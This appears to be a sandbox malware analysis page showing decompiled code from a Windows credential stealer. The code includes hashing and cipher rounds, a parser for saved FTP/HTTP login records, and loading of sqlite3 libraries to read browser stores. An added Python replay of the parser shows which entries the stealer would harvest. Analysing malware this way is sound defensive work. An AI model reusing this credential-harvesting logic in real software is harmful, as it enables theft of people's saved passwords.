                                                                    					_t293 = (_t391 ^ _t244 ^ _t342) + _t290 - 0x3b53a99b +  *((intOrPtr*)(_t645 + 8)) + _t342;
                                                                    					_t150 = _t244 - 0xbd6ddbc; // 0xf4292243
                                                                    					asm("rol eax, 0x6");
                                                                    					_t247 = ((0xffffffff ^ _t391 | _t293) ^ _t342) + _t150 +  *_t645 + _t293;
                                                                    					_t152 = _t391 + 0x432aff97; // 0x1432aff96
                                                                    					asm("rol edx, 0xa");
                                                                    					_t394 = ((0xffffffff ^ _t342 | _t247) ^ _t293) + _t152 +  *((intOrPtr*)(_t645 + 0x1c)) + _t247;
                                                                    					_t155 = _t342 - 0x546bdc59; // 0xab9423a6
                                                                    					asm("rol ecx, 0xf");
                                                                    					_t345 = ((0xffffffff ^ _t293 | _t394) ^ _t247) + _t155 +  *((intOrPtr*)(_t645 + 0x38)) + _t394;
                                                                    					_t158 = _t293 - 0x36c5fc7; // 0xfc93a038
                                                                    					asm("rol ebx, 0x15");
                                                                    					_t296 = ((0xffffffff ^ _t247 | _t345) ^ _t394) + _t158 +  *((intOrPtr*)(_t645 + 0x14)) + _t345;
                                                                    					_t161 = _t247 + 0x655b59c3; // 0x1655b59c2
                                                                    					asm("rol eax, 0x6");
                                                                    					_t250 = ((0xffffffff ^ _t394 | _t296) ^ _t345) + _t161 +  *((intOrPtr*)(_t645 + 0x30)) + _t296;
                                                                    					_t164 = _t394 - 0x70f3336e; // 0x8f0ccc91
                                                                    					asm("rol edx, 0xa");
                                                                    					_t397 = ((0xffffffff ^ _t345 | _t250) ^ _t296) + _t164 +  *((intOrPtr*)(_t645 + 0xc)) + _t250;
                                                                    					_t167 = _t345 - 0x100b83; // 0xffeff47c
                                                                    					asm("rol ecx, 0xf");
                                                                    					_t348 = ((0xffffffff ^ _t296 | _t397) ^ _t250) + _t167 +  *((intOrPtr*)(_t645 + 0x28)) + _t397;
                                                                    					_t170 = _t296 - 0x7a7ba22f; // 0x85845dd0
                                                                    					asm("rol ebx, 0x15");
                                                                    					_t299 = ((0xffffffff ^ _t250 | _t348) ^ _t397) + _t170 +  *((intOrPtr*)(_t645 + 4)) + _t348;
                                                                    					_t173 = _t250 + 0x6fa87e4f; // 0x16fa87e4e
                                                                    					asm("rol eax, 0x6");
                                                                    					_t253 = ((0xffffffff ^ _t397 | _t299) ^ _t348) + _t173 +  *((intOrPtr*)(_t645 + 0x20)) + _t299;
                                                                    					_t176 = _t397 - 0x1d31920; // 0xfe2ce6df
                                                                    					asm("rol edx, 0xa");
                                                                    					_t400 = ((0xffffffff ^ _t348 | _t253) ^ _t299) + _t176 +  *((intOrPtr*)(_t645 + 0x3c)) + _t253;
                                                                    					_t179 = _t348 - 0x5cfebcec; // 0xa3014313
                                                                    					asm("rol ecx, 0xf");
                                                                    					_t351 = ((0xffffffff ^ _t299 | _t400) ^ _t253) + _t179 +  *((intOrPtr*)(_t645 + 0x18)) + _t400;
                                                                    					_t182 = _t299 + 0x4e0811a1; // 0x14e0811a0
                                                                    					asm("rol ebx, 0x15");
                                                                    					_t302 = ((0xffffffff ^ _t253 | _t351) ^ _t400) + _t182 +  *((intOrPtr*)(_t645 + 0x34)) + _t351;
                                                                    					_t185 = _t253 - 0x8ac817e; // 0xf7537e81
                                                                    					asm("rol eax, 0x6");
                                                                    					_t256 = ((0xffffffff ^ _t400 | _t302) ^ _t351) + _t185 +  *((intOrPtr*)(_t645 + 0x10)) + _t302;
                                                                    					_t188 = _t400 - 0x42c50dcb; // 0xbd3af234
                                                                    					asm("rol edx, 0xa");
                                                                    					_t403 = ((0xffffffff ^ _t351 | _t256) ^ _t302) + _t188 +  *((intOrPtr*)(_t645 + 0x2c)) + _t256;
                                                                    					_t191 = _t351 + 0x2ad7d2bb; // 0x12ad7d2ba
                                                                    					asm("rol ecx, 0xf");
                                                                    					_t354 = ((0xffffffff ^ _t302 | _t403) ^ _t256) + _t191 +  *((intOrPtr*)(_t645 + 8)) + _t403;
                                                                    					_t194 = _t302 - 0x14792c6f; // 0xeb86d390
                                                                    					asm("rol ebx, 0x15");
                                                                    					_t404 = _a4;
                                                                    					 *_t404 =  *_t404 + _t256;
                                                                    					 *(_t404 + 4) =  *(_t404 + 4) + ((0xffffffff ^ _t256 | _t354) ^ _t403) + _t194 +  *((intOrPtr*)(_t645 + 0x24)) + _t354;
                                                                    					 *(_t404 + 8) =  *(_t404 + 8) + _t354;
                                                                    					 *(_t404 + 0xc) =  *(_t404 + 0xc) + _t403;
                                                                    					_t203 =  &_v8;
                                                                    					 *_t203 = _v8 - 1;
                                                                    					_t645 = _t645 + 0x40;
                                                                    				} while ( *_t203 >= 0);
                                                                    				return _t256;
                                                                    			}

                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: b572f9d2c9c2a1160aa7d0b082204b5005edb68fc1495acda48a505fa1360f70
                                                                    • Instruction ID: 2545cf6bef447fb7225041bb1f3c9065af7e7a2ad6f25ff4df53b15ebc9ce0fc
                                                                    • Opcode Fuzzy Hash: b572f9d2c9c2a1160aa7d0b082204b5005edb68fc1495acda48a505fa1360f70
                                                                    • Instruction Fuzzy Hash: 05121E73405A015BE75DCE2ECCC0692B3E3BBD826435BD63DC46AC3A45FE74B61A8648
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E004121E9(signed int* _a4, signed int* _a8) {
                                                                    				unsigned int _v8;
                                                                    				intOrPtr _v12;
                                                                    				signed int _v16;
                                                                    				signed int* _t40;
                                                                    				signed int* _t41;
                                                                    				signed int* _t42;
                                                                    				signed int* _t43;
                                                                    				signed int* _t69;
                                                                    				signed int _t73;
                                                                    				signed int _t75;
                                                                    				signed int _t77;
                                                                    				signed int _t79;
                                                                    				signed int _t81;
                                                                    				signed int _t93;
                                                                    				signed int _t95;
                                                                    				signed int _t97;
                                                                    				signed int _t99;
                                                                    				signed int _t101;
                                                                    				signed int _t105;
                                                                    				signed int _t106;
                                                                    				signed int _t107;
                                                                    				signed int _t108;
                                                                    				signed int _t110;
                                                                    				unsigned int _t111;
                                                                    				signed int _t113;
                                                                    				signed int _t114;
                                                                    				signed int _t115;
                                                                    				signed int _t116;
                                                                    				signed int _t117;
                                                                    				signed int _t119;
                                                                    				signed int _t120;
                                                                    				signed int _t121;
                                                                    				signed int _t122;
                                                                    				signed int _t123;
                                                                    				signed int _t126;
                                                                    				signed int _t129;
                                                                    				signed int _t130;
                                                                    				signed int _t131;
                                                                    				signed int _t132;
                                                                    				signed int _t197;
                                                                    
                                                                    				_t40 = _a8;
                                                                    				_t119 =  *_a4;
                                                                    				_t105 = _a4[1];
                                                                    				_t73 = (_t119 >> 0x00000004 ^ _t105) & 0x0f0f0f0f;
                                                                    				_t106 = _t105 ^ _t73;
                                                                    				_t120 = _t119 ^ _t73 << 0x00000004;
                                                                    				_t75 = (_t120 >> 0x00000010 ^ _t106) & 0x0000ffff;
                                                                    				_t107 = _t106 ^ _t75;
                                                                    				_t121 = _t120 ^ _t75 << 0x00000010;
                                                                    				_t77 = (_t107 >> 0x00000002 ^ _t121) & 0x33333333;
                                                                    				_t122 = _t121 ^ _t77;
                                                                    				_t108 = _t107 ^ _t77 << 0x00000002;
                                                                    				_t79 = (_t108 >> 0x00000008 ^ _t122) & 0x00ff00ff;
                                                                    				_t123 = _t122 ^ _t79;
                                                                    				_t197 = _t79 << 0x00000008 ^ _t108;
                                                                    				_v8 = _t197;
                                                                    				_t110 = _t197 + _t197 | _v8 >> 0x0000001f & 0x00000001;
                                                                    				_t81 = (_t123 ^ _t110) & 0xaaaaaaaa;
                                                                    				_t111 = _t110 ^ _t81;
                                                                    				_t126 = (_t123 ^ _t81) + (_t123 ^ _t81) | (_t123 ^ _t81) >> 0x0000001f & 0x00000001;
                                                                    				_v12 = 8;
                                                                    				do {
                                                                    					_t41 =  &(_t40[1]);
                                                                    					_v16 =  *(0x417cf0 + (((_t111 << 0x0000001c | _t111 >> 0x00000004) ^  *_t40) & 0x0000003f) * 4) |  *((((_t111 << 0x0000001c | _t111 >> 0x00000004) ^  *_t40) >> 0x00000006 & 0x000000fc) + 0x417af0) |  *((((_t111 << 0x0000001c | _t111 >> 0x00000004) ^  *_t40) >> 0x0000000e & 0x000000fc) + 0x4178f0) |  *((((_t111 << 0x0000001c | _t111 >> 0x00000004) ^  *_t40) >> 0x00000016 & 0x000000fc) + 0x4176f0);
                                                                    					_t42 =  &(_t41[1]);
                                                                    					_t126 = _t126 ^ ( *(0x417df0 + ((_t111 ^  *_t41) & 0x0000003f) * 4) | _v16 |  *(((_t111 ^  *_t41) >> 0x00000006 & 0x000000fc) + 0x417bf0) |  *(((_t111 ^  *_t41) >> 0x0000000e & 0x000000fc) + 0x4179f0) |  *(((_t111 ^  *_t41) >> 0x00000016 & 0x000000fc) + 0x4177f0));
                                                                    					_t43 =  &(_t42[1]);
                                                                    					_v16 =  *(0x417cf0 + (((_t126 << 0x0000001c | _t126 >> 0x00000004) ^  *_t42) & 0x0000003f) * 4) |  *((((_t126 << 0x0000001c | _t126 >> 0x00000004) ^  *_t42) >> 0x00000006 & 0x000000fc) + 0x417af0) |  *((((_t126 << 0x0000001c | _t126 >> 0x00000004) ^  *_t42) >> 0x0000000e & 0x000000fc) + 0x4178f0) |  *((((_t126 << 0x0000001c | _t126 >> 0x00000004) ^  *_t42) >> 0x00000016 & 0x000000fc) + 0x4176f0);
                                                                    					_t40 =  &(_t43[1]);
                                                                    					_t111 = _t111 ^ ( *(0x417df0 + ((_t126 ^  *_t43) & 0x0000003f) * 4) | _v16 |  *(((_t126 ^  *_t43) >> 0x00000006 & 0x000000fc) + 0x417bf0) |  *(((_t126 ^  *_t43) >> 0x0000000e & 0x000000fc) + 0x4179f0) |  *(((_t126 ^  *_t43) >> 0x00000016 & 0x000000fc) + 0x4177f0));
                                                                    					_v12 = _v12 - 1;
                                                                    				} while (_v12 != 0);
                                                                    				_t113 = _t111 << 0x0000001f | _t111 >> 0x00000001;
                                                                    				_t93 = (_t126 ^ _t113) & 0xaaaaaaaa;
                                                                    				_t114 = _t113 ^ _t93;
                                                                    				_t129 = (_t126 ^ _t93) << 0x0000001f | (_t126 ^ _t93) >> 0x00000001;
                                                                    				_t95 = (_t129 >> 0x00000008 ^ _t114) & 0x00ff00ff;
                                                                    				_t115 = _t114 ^ _t95;
                                                                    				_t130 = _t129 ^ _t95 << 0x00000008;
                                                                    				_t97 = (_t130 >> 0x00000002 ^ _t115) & 0x33333333;
                                                                    				_t116 = _t115 ^ _t97;
                                                                    				_t131 = _t130 ^ _t97 << 0x00000002;
                                                                    				_t99 = (_t116 >> 0x00000010 ^ _t131) & 0x0000ffff;
                                                                    				_t132 = _t131 ^ _t99;
                                                                    				_t117 = _t116 ^ _t99 << 0x00000010;
                                                                    				_t101 = (_t117 >> 0x00000004 ^ _t132) & 0x0f0f0f0f;
                                                                    				 *_a4 = _t101 << 0x00000004 ^ _t117;
                                                                    				_a4 =  &(_a4[1]);
                                                                    				_t69 = _a4;
                                                                    				 *_t69 = _t132 ^ _t101;
                                                                    				return _t69;
                                                                    			}

                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 24e81fb78ac354ee097640eab5717c4d3c17e347a3450a17031ab049b40a00ab
                                                                    • Instruction ID: a3ab7fe7015f67ee49eb8ee9fe6df9325a8b680d2dcb251794c37e3166a95e3c
                                                                    • Opcode Fuzzy Hash: 24e81fb78ac354ee097640eab5717c4d3c17e347a3450a17031ab049b40a00ab
                                                                    • Instruction Fuzzy Hash: 7B719237F506364BE7589DAA8881155F7A2ABC8320B5F827DCD19F7381C9B4BD12C6C4
                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 81%
                                                                    			E004094D8(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                    				intOrPtr _v8;
                                                                    				intOrPtr _v12;
                                                                    				char _v20;
                                                                    				int _v24;
                                                                    				int _v28;
                                                                    				int* _v32;
                                                                    				int* _v36;
                                                                    				int* _v40;
                                                                    				int* _v44;
                                                                    				int* _v48;
                                                                    				int _v52;
                                                                    				int _v56;
                                                                    				int _v60;
                                                                    				int _v64;
                                                                    				char* _v68;
                                                                    				int _v72;
                                                                    				int _v76;
                                                                    				int _v80;
                                                                    				void* _t85;
                                                                    				int _t87;
                                                                    				int _t90;
                                                                    				int _t94;
                                                                    				int _t98;
                                                                    				int _t102;
                                                                    				int _t105;
                                                                    				int _t109;
                                                                    				int _t110;
                                                                    				int _t111;
                                                                    				int _t123;
                                                                    				int _t125;
                                                                    				void* _t127;
                                                                    				int _t128;
                                                                    				int* _t130;
                                                                    
                                                                    				_t85 = E00401F36(_a8);
                                                                    				if(_t85 != 0) {
                                                                    					_t87 = E0040413F(_a8);
                                                                    					__eflags = _t87;
                                                                    					if(_t87 == 0) {
                                                                    						E00409061(_t87, _a12, _a16);
                                                                    						_t90 = E00401FFD(__eflags, _a8,  &_v20);
                                                                    						__eflags = _t90;
                                                                    						if(_t90 != 0) {
                                                                    							_t94 = E004025E7(_v12, _v8);
                                                                    							__eflags = _t94;
                                                                    							if(_t94 != 0) {
                                                                    								_v24 = _t94;
                                                                    								_t130 = _t94;
                                                                    								__eflags =  *_t130;
                                                                    								if(__eflags != 0) {
                                                                    									_t98 = E0040949C(__eflags, _t130);
                                                                    									_v52 = _t98;
                                                                    									_push(_v52);
                                                                    									_push("#2c");
                                                                    									L004106EE();
                                                                    									_push(_t98);
                                                                    									_push(_v52);
                                                                    									_push("#2d");
                                                                    									L004106EE();
                                                                    									_push(_t98);
                                                                    									_push(_v52);
                                                                    									_push("#2e");
                                                                    									L004106EE();
                                                                    									_pop(_t128);
                                                                    									_pop(_t125);
                                                                    									__eflags = _t98;
                                                                    									if(_t98 == 0) {
                                                                    										L10:
                                                                    										__eflags = _t125;
                                                                    										if(_t125 != 0) {
                                                                    											_v80 = 0;
                                                                    										} else {
                                                                    											_v80 = 1;
                                                                    										}
                                                                    										asm("cld");
                                                                    										_t127 = 0xffffffff;
                                                                    										asm("repne scasb");
                                                                    										__eflags =  *_t130;
                                                                    										if ( *_t130 != 0) goto L14;
                                                                    										_v28 = 0;
                                                                    										while(1) {
                                                                    											__eflags =  *_t130;
                                                                    											if(__eflags == 0) {
                                                                    												goto L52;
                                                                    											}
                                                                    											_t102 = E0040949C(__eflags, _t130);
                                                                    											_v56 = _t102;
                                                                    											__eflags = _v28;
                                                                    											if(_v28 != 0) {
                                                                    												__eflags = _v28 - 1;
                                                                    												if(_v28 != 1) {
                                                                    													__eflags = _v28 - 2;
                                                                    													if(_v28 != 2) {
                                                                    														__eflags = _v28 - 3;
                                                                    														if(_v28 != 3) {
                                                                    															__eflags = _v28 - 4;
                                                                    															if(_v28 != 4) {
                                                                    																__eflags = _v28 - 5;
                                                                    																if(_v28 != 5) {
                                                                    																	__eflags = _v28 - 6;
                                                                    																	if(_v28 == 6) {
                                                                    																		_v28 = 2;
                                                                    																	}
                                                                    																} else {
                                                                    																	_v48 = _t130;
                                                                    																	__eflags = _v80;
                                                                    																	if(__eflags == 0) {
                                                                    																		_v28 = 6;
                                                                    																	} else {
                                                                    																		_v28 = 2;
                                                                    																	}
                                                                    																	_v68 = 0;
                                                                    																	_v60 = 0;
                                                                    																	_v64 = 0;
                                                                    																	_v72 = 0;
                                                                    																	_v76 = 0;
                                                                    																	_v68 = E0040949C(__eflags, _v32);
                                                                    																	_v60 = E0040949C(__eflags, _v40);
                                                                    																	_t109 = E0040949C(__eflags, _v48);
                                                                    																	_v64 = _t109;
                                                                    																	__eflags =  *0x416030;
                                                                    																	if( *0x416030 != 0) {
                                                                    																		__eflags =  *0x416030 - 1;
                                                                    																		if( *0x416030 != 1) {
                                                                    																			_t110 = 0;
                                                                    																			__eflags = 0;
                                                                    																		} else {
                                                                    																			_push("ftp.");
                                                                    																			L0041066A();
                                                                    																			_t110 = StrCmpNIA(_v68, "ftp.", _t109);
                                                                    																		}
                                                                    																	} else {
                                                                    																		_push("ftp://");
                                                                    																		L0041066A();
                                                                    																		_t123 = StrCmpNIA(_v68, "ftp://", _t109);
                                                                    																		__eflags = _t123;
                                                                    																		if(_t123 != 0) {
                                                                    																			_push("http://");
                                                                    																			L0041066A();
                                                                    																			_t123 = StrCmpNIA(_v68, "http://", _t123);
                                                                    																		}
                                                                    																		_t110 = _t123;
                                                                    																		__eflags = _t110;
                                                                    																		if(_t110 != 0) {
                                                                    																			_push("https://");
                                                                    																			L0041066A();
                                                                    																			_t110 = StrCmpNIA(_v68, "https://", _t110);
                                                                    																		}
                                                                    																	}
                                                                    																	_t111 = _t110;
                                                                    																	__eflags = _t111;
                                                                    																	if(_t111 == 0) {
                                                                    																		_push(_v60);
                                                                    																		L0041066A();
                                                                    																		_v72 = E00409142(_t127, _v60, _t111);
                                                                    																		_push(_v64);
                                                                    																		L0041066A();
                                                                    																		_v76 = E00409142(_t127, _v64, _t116);
                                                                    																		__eflags = _v68;
                                                                    																		if(_v68 != 0) {
                                                                    																			__eflags = _v76;
                                                                    																			if(_v76 != 0) {
                                                                    																				E004015CB(E004015CB(E004015CB(E00401569(_a4, 0xbeef0000), _a4, _v68), _a4, _v72), _a4, _v76);
                                                                    																			}
                                                                    																		}
                                                                    																	}
                                                                    																	E004018B8(_v68);
                                                                    																	E004018B8(_v60);
                                                                    																	E004018B8(_v64);
                                                                    																	E004018B8(_v72);
                                                                    																	_t102 = E004018B8(_v76);
                                                                    																}
                                                                    															} else {
                                                                    																_v44 = _t130;
                                                                    																_v28 = 5;
                                                                    															}
                                                                    														} else {
                                                                    															_v40 = _t130;
                                                                    															_v28 = 4;
                                                                    														}
                                                                    													} else {
                                                                    														_v36 = _t130;
                                                                    														_v28 = 3;
                                                                    													}
                                                                    												} else {
                                                                    													_v32 = _t130;
                                                                    													_v28 = 2;
                                                                    												}
                                                                    												__eflags = _v28;
                                                                    												if(_v28 != 0) {
                                                                    													_push(0x414f84);
                                                                    													_push(_v56);
                                                                    													L004106EE();
                                                                    													_t105 = _t102;
                                                                    													__eflags = _t105;
                                                                    													if(_t105 == 0) {
                                                                    														_v28 = 1;
                                                                    													}
                                                                    													_push("---");
                                                                    													_push(_v56);
                                                                    													L004106EE();
                                                                    													__eflags = _t105;
                                                                    													if(_t105 == 0) {
                                                                    														_v28 = 2;
                                                                    													}
                                                                    												}
                                                                    											} else {
                                                                    												_push(0x414f84);
                                                                    												_push(_v56);
                                                                    												L004106EE();
                                                                    												__eflags = _t102;
                                                                    												if(_t102 == 0) {
                                                                    													_v28 = 1;
                                                                    												}
                                                                    											}
                                                                    											E004018B8(_v56);
                                                                    											asm("cld");
                                                                    											_t127 = 0xffffffff;
                                                                    											asm("repne scasb");
                                                                    											__eflags =  *_t130;
                                                                    											if( *_t130 != 0) {
                                                                    												continue;
                                                                    											}
                                                                    											goto L52;
                                                                    										}
                                                                    									} else {
                                                                    										__eflags = _t128;
                                                                    										if(_t128 == 0) {
                                                                    											goto L10;
                                                                    										} else {
                                                                    											_t125 = _t125;
                                                                    											__eflags = _t125;
                                                                    											if(_t125 == 0) {
                                                                    												goto L10;
                                                                    											}
                                                                    										}
                                                                    									}
                                                                    									L52:
                                                                    									E004018B8(_v52);
                                                                    								}
                                                                    								E004018B8(_v24);
                                                                    							}
                                                                    							E00402091( &_v20);
                                                                    						}
                                                                    						return E00409119();
                                                                    					} else {
                                                                    						return _t87;
                                                                    					}
                                                                    				} else {
                                                                    					return _t85;
                                                                    				}
                                                                    			}
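The decompiled routine above is a line-oriented state machine: the buffer returned by E004025E7 must start with one of the tags "#2c", "#2d" or "#2e"; afterwards a marker line (the string at 0x414f84, whose contents are not shown on this page) starts a record, "---" rewinds to the second field, and the first, third and fifth fields of each record are checked and appended to the report after the 0xBEEF0000 marker. Which first-field prefixes are accepted depends on the global at 0x416030: 0 requires a case-insensitive "ftp://", "http://" or "https://" prefix, 1 requires "ftp.", anything else accepts all. The Python below replays that state machine so an analyst can feed it a candidate credential file and see which entries the stealer would pick up. It is an added example written for this page, not the sample's code or the sandbox's output. Assumptions, also marked in the code: the marker string is caller-supplied (`record_marker`); E0040949C is treated as "copy the current line"; E00409142, applied to the user and password fields, is modelled as a `decode` callback that is the identity by default; the global at 0x416030 is `mode`; the flag `_v80` is derived by reading the decompiler's pop order literally (set when the header is "#2c"); the NUL-separated buffer is modelled as newline-separated text terminated by the first empty line; the sample input is constructed.

```python
"""Replay of the record parser decompiled as E004094D8 (added example, not the sample's code)."""
from typing import Callable, List, Optional, Tuple

# Taken verbatim from the decompiled code.
HEADER_TAGS = ("#2c", "#2d", "#2e")
SEPARATOR = "---"

# (first field, decoded third field, decoded fifth field): the order in which
# E004015CB appends them after E00401569(_a4, 0xbeef0000).
Record = Tuple[str, Optional[str], str]


def prefix_accepted(url: str, mode: int) -> bool:
    """Mirror of the StrCmpNIA checks keyed on the global at 0x416030 (modelled as `mode`)."""
    low = url.lower()  # StrCmpNIA compares case-insensitively
    if mode == 0:
        return low.startswith(("ftp://", "http://", "https://"))
    if mode == 1:
        return low.startswith("ftp.")
    return True  # any other value: _t110 = 0, no prefix requirement


def parse_records(
    text: str,
    record_marker: str,                      # hypothetical: string at 0x414f84 is not on the page
    mode: int = 0,
    decode: Callable[[str], Optional[str]] = lambda s: s,  # stands in for E00409142
) -> List[Record]:
    """Walk the lines exactly as the decompiled loop does and return the emitted records."""
    lines = text.split("\n")
    if not lines or lines[0] not in HEADER_TAGS:
        return []  # no recognised header: the sample frees the buffer and parses nothing
    # _v80: reading the decompiler's pop order literally it is set for "#2c"; it only
    # decides whether the state after the fifth field is 2 or 6.
    restart_at_field2 = lines[0] == "#2c"

    state = 0
    fields: List[Optional[str]] = [None] * 6  # indices 1..5 stand for _v32, _v36, _v40, _v44, _v48
    out: List[Record] = []

    for line in lines[1:]:
        if line == "":
            break  # *_t130 == 0: end of the NUL-separated buffer
        if state == 0:
            if line == record_marker:
                state = 1
            continue  # state 0 only looks for the marker
        if 1 <= state <= 4:
            fields[state] = line  # fields are never cleared, as in the original locals
            state += 1
        elif state == 5:
            fields[5] = line
            state = 2 if restart_at_field2 else 6
            url = fields[1]
            # assumption: a record whose first field was never set is skipped
            if url is not None and prefix_accepted(url, mode):
                user = decode(fields[3])      # _v72 = E00409142(_v60)
                password = decode(fields[5])  # _v76 = E00409142(_v64)
                if password is not None:      # _v68 != 0 && _v76 != 0
                    out.append((url, user, password))
        elif state == 6:
            state = 2
        # applied to every line once the state is non-zero
        if line == record_marker:
            state = 1
        if line == SEPARATOR:
            state = 2
    return out


# Constructed sample input; "SITE" is a hypothetical marker chosen for the example.
SAMPLE = "\n".join([
    "#2c",
    "SITE", "ftp://ftp.example.test", "---", "21", "alice", "0", "s3cret",
    "SITE", "www.example.test", "---", "80", "bob", "0", "hunter2",
    "SITE", "https://portal.example.test", "---", "443", "carol", "1", "pw3",
])

if __name__ == "__main__":
    for mode in (0, 1, 2):
        print(mode, parse_records(SAMPLE, "SITE", mode=mode))
```

Running the block prints, per mode, the entries the parser would report: with mode 0 the bare host "www.example.test" is dropped, with mode 1 nothing matches because no first field begins with "ftp.", and with any other mode all three records are emitted. Swapping `decode` for the real transform behind E00409142 is the only change needed once that routine has been analysed.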

                                                                    Instruction address column for E004094D8, 0x004094e7 .. 0x00409706 in this excerpt (disassembly listing; the instruction text for these addresses is not present on this page)
                                                                    0x0040970b
                                                                    0x00409719
                                                                    0x00409719
                                                                    0x004096ab
                                                                    0x004096ab
                                                                    0x004096b0
                                                                    0x004096c3
                                                                    0x004096c3
                                                                    0x004096c5
                                                                    0x004096c7
                                                                    0x004096cc
                                                                    0x004096da
                                                                    0x004096da
                                                                    0x004096df
                                                                    0x004096df
                                                                    0x004096e1
                                                                    0x004096e3
                                                                    0x004096e8
                                                                    0x004096f6
                                                                    0x004096f6
                                                                    0x004096e1
                                                                    0x00409722
                                                                    0x00409722
                                                                    0x00409724
                                                                    0x00409726
                                                                    0x00409729
                                                                    0x00409737
                                                                    0x0040973a
                                                                    0x0040973d
                                                                    0x0040974b
                                                                    0x0040974e
                                                                    0x00409752
                                                                    0x00409754
                                                                    0x00409758
                                                                    0x00409783
                                                                    0x00409783
                                                                    0x00409758
                                                                    0x00409752
                                                                    0x0040978b
                                                                    0x00409793
                                                                    0x0040979b
                                                                    0x004097a3
                                                                    0x004097ab
                                                                    0x004097ab
                                                                    0x0040962c
                                                                    0x0040962c
                                                                    0x0040962f
                                                                    0x0040962f
                                                                    0x00409617
                                                                    0x00409617
                                                                    0x0040961a
                                                                    0x0040961a
                                                                    0x00409602
                                                                    0x00409602
                                                                    0x00409605
                                                                    0x00409605
                                                                    0x004095ed
                                                                    0x004095ed
                                                                    0x004095f0
                                                                    0x004095f0
                                                                    0x004097bf
                                                                    0x004097c3
                                                                    0x004097c5
                                                                    0x004097ca
                                                                    0x004097cd
                                                                    0x004097d2
                                                                    0x004097d2
                                                                    0x004097d4
                                                                    0x004097d6
                                                                    0x004097d6
                                                                    0x004097dd
                                                                    0x004097e2
                                                                    0x004097e5
                                                                    0x004097ea
                                                                    0x004097ec
                                                                    0x004097ee
                                                                    0x004097ee
                                                                    0x004097ec
                                                                    0x004095c6
                                                                    0x004095c6
                                                                    0x004095cb
                                                                    0x004095ce
                                                                    0x004095d3
                                                                    0x004095d5
                                                                    0x004095db
                                                                    0x004095db
                                                                    0x004095d5
                                                                    0x004097f8
                                                                    0x004097fd
                                                                    0x00409800
                                                                    0x00409805
                                                                    0x00409807
                                                                    0x00409809
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00409809
                                                                    0x00409579
                                                                    0x00409579
                                                                    0x0040957b
                                                                    0x00000000
                                                                    0x0040957d
                                                                    0x0040957d
                                                                    0x0040957d
                                                                    0x0040957f
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0040957f
                                                                    0x0040957b
                                                                    0x0040980f
                                                                    0x00409812
                                                                    0x00409812
                                                                    0x0040981a
                                                                    0x0040981a
                                                                    0x00409823
                                                                    0x00409823
                                                                    0x0040982f
                                                                    0x004094fe
                                                                    0x004094fe
                                                                    0x004094fe
                                                                    0x004094ed
                                                                    0x004094ed
                                                                    0x004094ed

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: #2c$#2d$#2e$---$ftp.$ftp://$http://$https://
                                                                    • API String ID: 0-1526611526
                                                                    • Opcode ID: 5cb0668236f4ab21225d3fc1a8a4d9074842248b6d3c0c65b2de98502e910106
                                                                    • Instruction ID: 8ada1e9ecac2b6a16ee08af0ca764310d7711adbc3e5f5be3c6fd46ad6a69e20
                                                                    • Opcode Fuzzy Hash: 5cb0668236f4ab21225d3fc1a8a4d9074842248b6d3c0c65b2de98502e910106
                                                                    • Instruction Fuzzy Hash: 6F912571910209EADF11AFA1CC46BEEBEB5AF44308F20443BF011722E2DBB94D91DB59
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 76%
                                                                    			E0040926B(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                    				char _v8;
                                                                    				char _v12;
                                                                    				char _v16;
                                                                    				intOrPtr _v20;
                                                                    				intOrPtr _v24;
                                                                    				char* _v28;
                                                                    				void* _t45;
                                                                    				void* _t47;
                                                                    				void* _t49;
                                                                    				void* _t51;
                                                                    				void* _t55;
                                                                    				void* _t58;
                                                                    				void* _t61;
                                                                    				char* _t64;
                                                                    				char* _t65;
                                                                    				int _t66;
                                                                    				int _t82;
                                                                    				void* _t83;
                                                                    				void* _t86;
                                                                    				void* _t87;
                                                                    				void* _t88;
                                                                    				void* _t89;
                                                                    
                                                                    				_t83 = __ecx;
                                                                    				_t45 = E00401F36(_a8);
                                                                    				if(_t45 != 0) {
                                                                    					_t47 = E0040413F(_a8);
                                                                    					if(_t47 == 0) {
                                                                    						_t49 = E00409061(_t47, _a12, _a16);
                                                                    						if(_t49 != 0) {
                                                                    							_t51 = E004024D6("mozsqlite3.dll", 0x416018);
                                                                    							if(_t51 == 0) {
                                                                    								_t51 = E004024D6("sqlite3.dll", 0x416018);
                                                                    							}
                                                                    							if(_t51 != 0) {
                                                                    								_t55 =  *0x416018(_a8,  &_v8);
                                                                    								_t88 = _t87 + 8;
                                                                    								if(_t55 == 0) {
